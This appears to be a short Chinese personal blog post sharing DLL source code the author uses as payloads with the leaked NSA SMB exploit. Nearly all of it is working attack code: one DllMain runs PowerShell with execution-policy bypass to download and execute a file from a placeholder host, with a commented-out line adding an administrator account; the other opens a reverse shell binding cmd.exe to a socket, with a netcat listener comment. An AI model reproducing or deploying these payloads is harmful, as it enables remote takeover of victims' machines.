NSA SMB dll code

发表于

这两天最火的是啥?方程式!

dll 源码
转眼就是是5.20了,回头才发现一个月没写博客了,好浪费啊,没办法,最近太忙了
记录一下自己用的dll源码吧

其实也是网上抄的。。。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "stdafx.h"
#include <windows.h>
void Fuck(void);
BOOL WINAPI DllMain(HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
{
	switch (dwReason)
	{
	case DLL_PROCESS_ATTACH:
		Fuck();
		break;
	case DLL_PROCESS_DETACH:
		break;
	case DLL_THREAD_ATTACH:
		break;
	case DLL_THREAD_DETACH:
		break;
	}
	return TRUE;
}
void Fuck(void) 
{
	
	WinExec("cmd.exe /c powershell.exe   -exec bypass  -Command (New-Object Net.WebClient).DownloadFile('http://127.0.0.1/1.exe','C:\\Windows\\Temp\\temp.exe');C:\\Windows\\Temp\\temp.exe", SW_NORMAL);
	//WinExec("net localgroup administrators   admin /add", SW_NORMAL);
	//WinExec("cmd.exe /c dir > c://result.txt", SW_NORMAL); 
	//WinExec("Cmd.exe /C md c://12", SW_HIDE);
	
}

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "stdafx.h"
#include <winsock2.h>  
#include <stdlib.h>
#pragma comment(lib,"ws2_32")
void reverse_shell();
WSADATA wsaData;
SOCKET Winsock;
SOCKET Sock;
struct sockaddr_in hax;
STARTUPINFO ini_processo;
PROCESS_INFORMATION processo_info;
BOOL WINAPI DllMain(HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
{
	switch (dwReason)
	{
	case DLL_PROCESS_ATTACH:
		reverse_shell();
		break;
	case DLL_PROCESS_DETACH:
		break;
	case DLL_THREAD_ATTACH:
		break;
	case DLL_THREAD_DETACH:
		break;
	}
	return TRUE;
}
void reverse_shell()
{
	LPCSTR szMyUniqueNamedEvent = "sysnullevt";
	HANDLE m_hEvent = CreateEventA(NULL, TRUE, FALSE, szMyUniqueNamedEvent);
	switch (GetLastError())
	{
		// app is already running
	case ERROR_ALREADY_EXISTS:
	{
								 CloseHandle(m_hEvent);
								 break;
	}
	case ERROR_SUCCESS:
	{
						  break;
	}
	}
	WSAStartup(MAKEWORD(2, 2), &wsaData);
	Winsock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);
	hax.sin_family = AF_INET;
	//nc -lvvp 4431   本机nc监听
	// 端口
	hax.sin_port = htons(atoi("4431"));
	//反弹ip
	hax.sin_addr.s_addr = inet_addr("127.0.0.1");
	WSAConnect(Winsock, (SOCKADDR*)&hax, sizeof(hax), NULL, NULL, NULL, NULL);
	memset(&ini_processo, 0, sizeof(ini_processo));
	ini_processo.cb = sizeof(ini_processo);
	ini_processo.dwFlags = STARTF_USESTDHANDLES;
	ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock;
	CreateProcessA(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, (LPSTARTUPINFOA)&ini_processo, &processo_info);
}